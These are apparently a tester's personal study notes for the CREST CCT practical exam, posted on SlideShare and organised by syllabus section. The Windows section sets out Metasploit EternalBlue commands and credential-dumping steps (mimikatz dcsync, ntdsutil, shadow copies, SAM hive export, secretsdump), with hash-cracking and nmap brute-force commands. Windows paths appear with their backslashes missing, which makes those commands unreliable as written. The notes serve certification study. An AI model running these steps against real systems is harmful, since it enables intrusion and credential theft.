SlideShare a Scribd company logo

CREST CCT Lab Prep Notes

N
NathanAn

My study notes for the practical which takes places at Slough.

Internet
1 of 14
Download to read offline
Long Question Useful  Web Server Counter Measures – p158 2nd Edition Appendix A: Soft Skills and Assessment Management A5 Record Keeping, Interim Reporting & Final Results Understanding reporting requirements. Understanding the importance of accurate and structured record keeping during the engagement. Appendix B: Core Technical Skills B4 Network Mapping & Target Identification Analysis of output from tools used to map the route between the engagement point and a number of targets. Network sweeping techniques to prioritise a target list and the potential for false negatives. B11 Cryptography Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES, 3DES, AES, RSA, RC4. Hashes: SHA1 and MD5 Message Integrity codes: HMAC Appendix C: Background Information Gathering & Open Source C3 Customer Web Site Analysis Analysis of information from a target web site, both from displayed content and from within the HTML source.
Appendix E: Microsoft Windows Security Assessment E4 Windows Passwords Password policies (complexity, lockout policies) Account Brute Forcing Hash Storage (merits of LANMAN, NTLMv1 / v2) Offline Password Analysis (rainbow tables / hash brute forcing) E5 Windows Vulnerabilities Knowledge of remote windows vulnerabilities, particularly those for which robust exploit code exists in the public domain. Video: MS17-010 – Eternal Blue msfconsole use auxiliary/scanner/smb/smb_ms17_010 show options set RHOSTS 10.10.12.107 exploit use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 10.10.12.107 exploit Metasploit.txt Metasploit Start up and Update Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability Exploits search: IIS, RDP use $exploit show options | show payloads | show targets set settings ... exploit/run (for auxiliary) Auxiliary Modules show options, set RHOSTS (and other values such THREADS, VHOSTS), run Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010 Knowledge of local windows privilege escalation vulnerabilities and techniques. Knowledge of common post exploitation activities:  Obtain password hashes, both from the local SAM and cached credentials HASHES  Hashes on stored in the SAM database on a Windows system, or the NTDS database on the Domain Controller. 1. SAM file (need both C:windowssystem32configSAM, and C:windowssystem32configsystem) 2. Registry (HKEY_LOCAL_MACHINESecurityCache for domain credentials, HKEY_LOCAL_MACHINESAM for local credentials)
3. Domain Controller: C:WindowsNTDSNTDS.dit 4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.  LM-hashes is the oldest password storage used by Windows, dating back to OS/2 in the 1980’s and were turned off by default starting in Windows Vista/Server 2008. it is possible to enable it in later versions through a GPO setting (even Windows 2016/10).  NTHash is often referred to as NTLM hash. The v1 of the protocol uses both the NT and LM hash, depending on configuration and what is available. NTLMv2 (different algorithm) s the default in Windows since Windows 2000. OBTAINING THE HASHES  Mimikatz has a feature (dcsync) which utilises the Directory Replication Service (DRS) to retrieve the password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain from the context of domain administrator. lsadump::dcsync /domain:pentestlab.local /all /csv  The ntdsutil is a part of the domain controller ecosystem and its purpose is to enable administrators to access and manage the windows Active Directory database. ntdsutil activate instance ntds ifm create full C:ntdsutil quit quit Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.  DiskShadow is a Microsoft signed binary which is used to assist administrators with operations related to the Volume Shadow Copy Service (VSS). DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary.
 VSSadmin – Comes with Windows servers. The volume shadow copy is a Windows command line utility which enables administrators to take backups of computers, volumes and files even if they are in use by the operating system. vssadmin list shadows - check whether any shadow copies already exist vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSAM C:SAM1 copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsSystem32configSYSTEM C:SYSTEM1 NTDS may not exist if you did not dump from a DC. vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…) Then extract using either SamDump2 or impacket.  Can also use Cain to dump the passwords.  Registry and SamDump2 C:WINDOWSsystem32>reg save hklmsam c:sam The operation completed successfully. C:WINDOWSsystem32>reg save hklmsystem c:system The operation completed successfully. C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. The security file contains the cached credentials. Copy the files to Kali and run SamDump2 (or impacket which gives more info) root@Kali:~# samdump2 system sam *disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: *disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  PWdump - PWdump7 needs to be run as admin. pwdump7 > hash.txt  Cached Credentials Having dumped the security hive from registry: C:WINDOWSsystem32>reg save hklmsecurity c:security The operation completed successfully. Then from Kali use impacket gives information of SAM and SYSTEM. The file name is sam and system. If you don’t have security you can remove it. root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam - security security -system system LOCAL
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies [*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:: : [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM 0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y 0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So.... 0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...) [*] NL$KM 0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2 0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f......... 0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X 0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG [*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0 0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7. 0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3... 0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3. 0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@. 0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x. 0050 00 00 00 00 30 00 00 00 00 00 ....0..... [*] Cleaning up...  Obtain locally-stored clear-text password  Crack password hashes John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker. It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute force attack first, then let the Rainbow Tables pick up the rest. SHA256 Hashing: kali# echo pearson | sha256sum 901….ba13 Windows password storage does not use salt so hashed passwords would look the same. Unlike in Linux, because of use of salting, if two users have same password then they will look different. NT password hashes will be mixed case, whereas LMHash will be all uppercase. John the Ripper John comes with its own dictionary at /usr/share/john/password.lst You can edit the file to add your own passwords, or use your own list using wordlist=/usr/share/john/file.lst. In the output, the username will be on the right-hand side and cracked password on the left. The number next to the username tells you which side of the password it is cracking for LMHASH which stores if password is greater than 8 characters it splits it into two and always make password upper case. So lowercase, password would be stored as PASSWOR and D. kali# john password-hashes.txt ACME201 (fireman:2)
The below command will show all passwords that have been cracked: kali# john –show password-hashes.txt The hidden directory in home ./john stores the output files of .log, .pot, .rec Change the format to NT cracking (default is LMHASH) kali# john password-hashes.txt –-format=nt …and then have to specify format in show command: kali# john –show password-hashes.txt –format=nt Hashcat GPU (graphics card) support, so faster and works on Windows and is able to crack a large variety of hash formats. hashcat64.exe –potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3 The potfile is where the cracked passwords will be stored, the -m 3000 specifies the hash format being cracked, 3000 is for LMhash and 1000 is for NT Hash, the -a specifies brute force. To view the cracked passwords: hashcat64.exe –m 3000 –potfile-path cracked_passwords.pot password_hashes.txt –show --username Can use a dictionary attack: hashcat64.exe –potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:toolshatsrockyou.txt -r D;toolhashcat-3.6.0rulesInsidePro-PasswordsPro.rule The rule specifies various mangling rules.  Check patch levels – CREST Exam Notes; WMIC: wmic qfe list full /format:htable > hotfixes.htm Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering" get-hotfix Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security RH: rpm -qa --last  Derive list of missing security patches -  Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
Appendix G: Web Technologies G2 Web Servers & their Flaws Common web servers and their fundamental differences and vulnerabilities associated with them:  IIS – P372 Network Security Assessment  Apache (and variants) – P373 Network Security Assessment G4 Web Protocols Web protocols: HTTP, HTTPS, SOAP. All HTTP web methods and response codes.  See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16) HTTP Header Fields relating to security features  See Web App and Exam Notes G7 Web Application Servers Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403), Ruby on Rails (p409) and AJAX. Chapter 14, Network Security Assessment. AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html G8 Web APIs Application interfaces: CGI, ISAPI filters and Apache modules. G9 Web Sub-Components Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X. Flash Application Testing .Net Thick Clients Java Applets Decompilation of client-side code Base64 decoding? – Burp Decoder
Appendix H: Web Testing Methodologies H3 Information Gathering from Web Mark-up Examples of the type of information available in web page source that may prove useful to an attacker:  Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.  Database Connection Strings  Credentials  Developer Comments  Other included files  Authenticated-only URLs H4 Authentication Mechanisms Common pitfalls associated with the design and implementation of application authentication mechanisms.  Useful p180, 2nd Edition H5 Authorisation Mechanisms Common pitfalls associated with the design and implementation of application authorisation mechanisms. H6 Input Validation The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation. H7 Application Fuzzing Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications. H9 Use of Cross Site Scripting Attacks Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker. H10 Use of Injection Attacks Potential implications of injection vulnerabilities:  SQL injection  LDAP injection  Code injection  XML injection Ways in which these techniques can be used to benefit an attacker.
H11 Session Handling Common pitfalls associated with the design and implementation of session handling mechanisms. H12 Encryption Common techniques used for encrypting data in transit and data at rest, either on the client or server side. Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes) Identification of common SSL vulnerabilities H13 Source Code Review Common techniques for identifying and reviewing deficiencies in the areas of security.  Useful table p164, 2nd Edition
Appendix I: Web Testing Techniques I1 Web Site Structure Discovery Spidering tools and their relevance in a web application test for discovering linked content. Forced browsing techniques to discover default or unlinked content - Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto  Identification of functionality within client-side code I2 Cross Site Scripting Attacks Arbitrary JavaScript execution. Using Cross Site Scripting techniques to obtain sensitive information from other users. Phishing techniques.  See XSS I3 SQL Injection Determine the existence of an SQL injection condition in a web application. Determine the existence of a blind SQL injection condition in a web application. Exploit SQL injection to enumerate the database and its structure. Exploit SQL injection to execute commands on the target server.  See SQL injection I4 Session ID Attacks Investigate session handling within a web application. Harvest and analyse a number of session identifiers for weaknesses.  See Testing Session ID and Token Strength  Useful table p167 2nd Edition I5 Fuzzing The concept of fuzzing within a web application testing methodology. Common fuzzing tools. I6 Parameter Manipulation Parameter manipulation techniques, particularly the use of client-side proxies. I7 Data Confidentiality & Integrity Identifying weak (or missing) encryption. Identifying insecure SSL configurations.
Identify insecure use of encoding techniques I8 Directory Traversal Identifying directory traversal vulnerabilities within applications.  See RFI and LFI, Path Transversal I9 File Uploads Identifying common vulnerabilities with file upload capabilities within applications.  See Uploads. I10 Code Injection Investigate and exploitation of code injection vulnerabilities within web applications  See OS command injection – get Commix working… I11 CRLF Attacks Assessment of web applications for CRLF vulnerabilities  See HTTP Testing – Headers I12 Application Logic Flaws Assessing the logic flow within an application and the potential for subverting the logic.
Appendix J: Databases J1 Microsoft SQL Server (p424) Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.  See CREST exam notes J2 Oracle RDBMS (p426) Derivation of version and patch information from hosts running Oracle software. Default Oracle accounts.  See CREST exam notes J3 Web / App / Database Connectivity Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications  See CREST exam notes Useful Nmap Scripts MS SQL ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions include support for account lockout policies. MySQL nmap -p 3306 –script=”mysql-info” 127.0.0.1 - Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt. nmap -sV -sC <target> 3306/tcp open mysql | mysql-info: | Protocol: 10 | Version: 5.0.51a-3ubuntu5.1 | Thread ID: 7 | Capabilities flags: 40968 | Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth | Status: Autocommit |_ Salt: bYytNQ/4V6IN+*3`imj mysql-enum – Performs valid-user enumeration. Server version 5.x are susceptible to an user enumeration attack due to different messages during login when using old authentication mechanism from versions 4.x and earlier. mysql-brute – Basic brute force, can be run without word list. nmap --script=mysql-brute <target> 3306/tcp open mysql | mysql-brute: | Accounts | root:root - Valid credentials
Additional Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318) ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and compressors that a server accepts. nmap -sV --script ssl-enum-ciphers -p 443 <host>  POODLE - We can deduce if a server is vulnerable to poodle if it supports SSLv3 protocol and uses CBC ciphers.  BEAST - Any server supporting SSLv3 OR TLS 1.0 and uses CBC ciphers. BEAST was indeed an attack on CBC mode with predictable (in fact known) IV in SSL3 and TLS1.0, because those protocols used the last block of the previous record, which (usually) has already been sent and seen by the adversary, as the IV for the next record. POODLE is not an attack on IV at all; it is a padding oracle attack on the padding used in SSL3 (and it turned out some debatably defective TLS1.0 implementations also), hence the acronym Padding Oracle on Downgraded Legacy Encryption Examples.txt HTTP Header Fields relating to security features – e.g. HSTS  See CREST Notes: HTTP Header Fields relating to security features  Useful p172, 2nd Edition Strict-Transport-Security.html Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing pattern matching in the response body. nmap --script http-webdav-scan -p80,8080 <target> Script Output PORT STATE SERVICE 8008/tcp open http | http-webdav-scan: | Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT | Server Type: DAV/0.9.8 Python/2.7.6 | Server Date: Fri, 22 May 2015 19:28:00 GMT | WebDAV type: Unknown | Directory Listing: | http://localhost | http://localhost:8008/WebDAVTest_b1tqTWeyRR | http://localhost:8008/WebDAVTest_A0QWJb7hcK | http://localhost:8008/WebDAVTest_hf9Mqqpi1M |_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
Metasploit has a few modules to test for WebDAV presence. WebDAV.txt Decompilation of client-side code – e.g. Flash, Java, .Net Flash  Flash maintains its own cookie store that allows for cookies (that can’t be deleted directly from the browser).  ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a similar sandbox environment to Java.  Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan24 can turn the bytecode back into ActionScript.  JPEXS Free Flash Decompiler  Perl Script – SWF-File-0.42 Java  Java code runs in two primary ways: either through standalone Java applications or through web applets. Applets are Java code specifically designed to run within a web page.  Java has a security model around the applets that tries to prevent them from calling malicious code. This model, also known as a sandbox.  A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.  Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted or permission to be given before accessing functionality that has security implications.  Java code is compiled into byte code resulting in a compiled class file and then proceed by the JVM.  Reversing Java using JD-GUI – page 391 .Net  JustDecompile Vulnerabilities in increasingly prevalent application frameworks – e.g. Rail (p409) Flash Application Testing Java Applets .Net Thick Clients Identification of functionality within client-side code that is accessible only to privileged users

Recommended

CREST CCT Exam Prep Notes
CREST CCT Exam Prep NotesCREST CCT Exam Prep Notes
CREST CCT Exam Prep NotesNathanAn
 
Ip security
Ip security Ip security
Ip security Dr.K.Sreenivas Rao
 
Hping dan nmap
Hping dan nmapHping dan nmap
Hping dan nmapBima Prakoso Sudibyo
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanningVi Tính Hoàng Nam
 
Tcp Udp Icmp And The Transport Layer
Tcp Udp Icmp And The Transport LayerTcp Udp Icmp And The Transport Layer
Tcp Udp Icmp And The Transport Layertmavroidis
 
GRE (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation)GRE (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation)NetProtocol Xpert
 
Network Security- port security.pptx
Network Security- port security.pptxNetwork Security- port security.pptx
Network Security- port security.pptxSulSya
 
IPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedIPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedAndriy Berestovskyy
 

Recommended

CREST CCT Exam Prep Notes
CREST CCT Exam Prep NotesCREST CCT Exam Prep Notes
CREST CCT Exam Prep NotesNathanAn
 
Ip security
Ip security Ip security
Ip security Dr.K.Sreenivas Rao
 
Hping dan nmap
Hping dan nmapHping dan nmap
Hping dan nmapBima Prakoso Sudibyo
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanningVi Tính Hoàng Nam
 
Tcp Udp Icmp And The Transport Layer
Tcp Udp Icmp And The Transport LayerTcp Udp Icmp And The Transport Layer
Tcp Udp Icmp And The Transport Layertmavroidis
 
GRE (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation)GRE (Generic Routing Encapsulation)
GRE (Generic Routing Encapsulation)NetProtocol Xpert
 
Network Security- port security.pptx
Network Security- port security.pptxNetwork Security- port security.pptx
Network Security- port security.pptxSulSya
 
IPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedIPsec Basics: AH and ESP Explained
IPsec Basics: AH and ESP ExplainedAndriy Berestovskyy
 
Port Scanning
Port ScanningPort Scanning
Port Scanningamiable_indian
 
Rainbow Tables
Rainbow TablesRainbow Tables
Rainbow TablesPanggi Libersa
 
A Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresA Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresNothing Nowhere
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocolssiva rama
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffingguestfa1226
 
IPSec and VPN
IPSec and VPNIPSec and VPN
IPSec and VPNAbdullaziz Tagawy
 
IPv6
IPv6IPv6
IPv6Peter R. Egli
 
Stegano Forensics
Stegano ForensicsStegano Forensics
Stegano ForensicsChiawei Wang
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017Michael Furman
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
Banner grabbing
Banner grabbingBanner grabbing
Banner grabbingarizonainfotech
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit ivArthyR3
 
Asa packet-flow-00
Asa packet-flow-00Asa packet-flow-00
Asa packet-flow-00vinaydewangan11
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocolsKailash Kumar
 
Different types of Symmetric key Cryptography
Different types of Symmetric key CryptographyDifferent types of Symmetric key Cryptography
Different types of Symmetric key Cryptographysubhradeep mitra
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
COMPUTER NETWORK_OSI & TCP/IP
COMPUTER NETWORK_OSI & TCP/IPCOMPUTER NETWORK_OSI & TCP/IP
COMPUTER NETWORK_OSI & TCP/IPSweta Kumari Barnwal
 
One-Time Pad Encryption
One-Time Pad EncryptionOne-Time Pad Encryption
One-Time Pad EncryptionCharles Southerland
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThomas Graf
 
Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)Peter R. Egli
 
Windows post exploitation
Windows post exploitationWindows post exploitation
Windows post exploitationyarden hanan
 
Ch19 system administration
Ch19 system administration Ch19 system administration
Ch19 system administration Raja Waseem Akhtar
 

More Related Content

What's hot

A Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresA Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresNothing Nowhere
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocolssiva rama
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit ivArthyR3
 
Different types of Symmetric key Cryptography
Different types of Symmetric key CryptographyDifferent types of Symmetric key Cryptography
Different types of Symmetric key Cryptographysubhradeep mitra
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThomas Graf
 
Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)Peter R. Egli
 

What's hot (20)

Port Scanning
Port ScanningPort Scanning
Port Scanning
 
Rainbow Tables
Rainbow TablesRainbow Tables
Rainbow Tables
 
A Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresA Brief History of Cryptographic Failures
A Brief History of Cryptographic Failures
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocols
 
Packet Sniffing
Packet SniffingPacket Sniffing
Packet Sniffing
 
IPSec and VPN
IPSec and VPNIPSec and VPN
IPSec and VPN
 
IPv6
IPv6IPv6
IPv6
 
Stegano Forensics
Stegano ForensicsStegano Forensics
Stegano Forensics
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
 
Banner grabbing
Banner grabbingBanner grabbing
Banner grabbing
 
Cs8792 cns - unit iv
Cs8792 cns - unit ivCs8792 cns - unit iv
Cs8792 cns - unit iv
 
Asa packet-flow-00
Asa packet-flow-00Asa packet-flow-00
Asa packet-flow-00
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocols
 
Different types of Symmetric key Cryptography
Different types of Symmetric key CryptographyDifferent types of Symmetric key Cryptography
Different types of Symmetric key Cryptography
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Need
 
COMPUTER NETWORK_OSI & TCP/IP
COMPUTER NETWORK_OSI & TCP/IPCOMPUTER NETWORK_OSI & TCP/IP
COMPUTER NETWORK_OSI & TCP/IP
 
One-Time Pad Encryption
One-Time Pad EncryptionOne-Time Pad Encryption
One-Time Pad Encryption
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
 
Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)Overview of Spanning Tree Protocol (STP & RSTP)
Overview of Spanning Tree Protocol (STP & RSTP)
 

Similar to CREST CCT Lab Prep Notes

Windows post exploitation
Windows post exploitationWindows post exploitation
Windows post exploitationyarden hanan
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hackingleminhvuong
 
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL EstelaJeffery653
 
202202 SUGUKI UNIX X Command Tips and Tricks
202202 SUGUKI UNIX X Command Tips and Tricks202202 SUGUKI UNIX X Command Tips and Tricks
202202 SUGUKI UNIX X Command Tips and Tricksdhorvath
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Andrew Case
 
Volatile memory analysis
Volatile memory analysisVolatile memory analysis
Volatile memory analysisHimanshu0734
 
Ataques dirigidos contra activistas
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistasDavid Barroso
 
Fundamentals of Physical Memory Analysis
Fundamentals of Physical Memory AnalysisFundamentals of Physical Memory Analysis
Fundamentals of Physical Memory AnalysisDmitry Vostokov
 
Crash dump analysis - experience sharing
Crash dump analysis - experience sharingCrash dump analysis - experience sharing
Crash dump analysis - experience sharingJames Hsieh
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems PerformanceBrendan Gregg
 
Unix Security
Unix SecurityUnix Security
Unix Securityreplay21
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Computer technicians-quick-reference-guide
Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guideShathees Rao
 

Similar to CREST CCT Lab Prep Notes (20)

Windows post exploitation
Windows post exploitationWindows post exploitation
Windows post exploitation
 
Ch19 system administration
Ch19 system administration Ch19 system administration
Ch19 system administration
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hacking
 
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
CHAPTER 26 WINDOWS SECURITY 26.1 FUNDAMENTAL
 
Linuxs1
Linuxs1Linuxs1
Linuxs1
 
202202 SUGUKI UNIX X Command Tips and Tricks
202202 SUGUKI UNIX X Command Tips and Tricks202202 SUGUKI UNIX X Command Tips and Tricks
202202 SUGUKI UNIX X Command Tips and Tricks
 
Hta w22
Hta w22Hta w22
Hta w22
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
 
Volatile memory analysis
Volatile memory analysisVolatile memory analysis
Volatile memory analysis
 
Microcontroller part 3
Microcontroller part 3Microcontroller part 3
Microcontroller part 3
 
Ataques dirigidos contra activistas
Ataques dirigidos contra activistasAtaques dirigidos contra activistas
Ataques dirigidos contra activistas
 
Intro To Hacking
Intro To HackingIntro To Hacking
Intro To Hacking
 
Fundamentals of Physical Memory Analysis
Fundamentals of Physical Memory AnalysisFundamentals of Physical Memory Analysis
Fundamentals of Physical Memory Analysis
 
Crash dump analysis - experience sharing
Crash dump analysis - experience sharingCrash dump analysis - experience sharing
Crash dump analysis - experience sharing
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems Performance
 
Unix Security
Unix SecurityUnix Security
Unix Security
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Computer technicians-quick-reference-guide
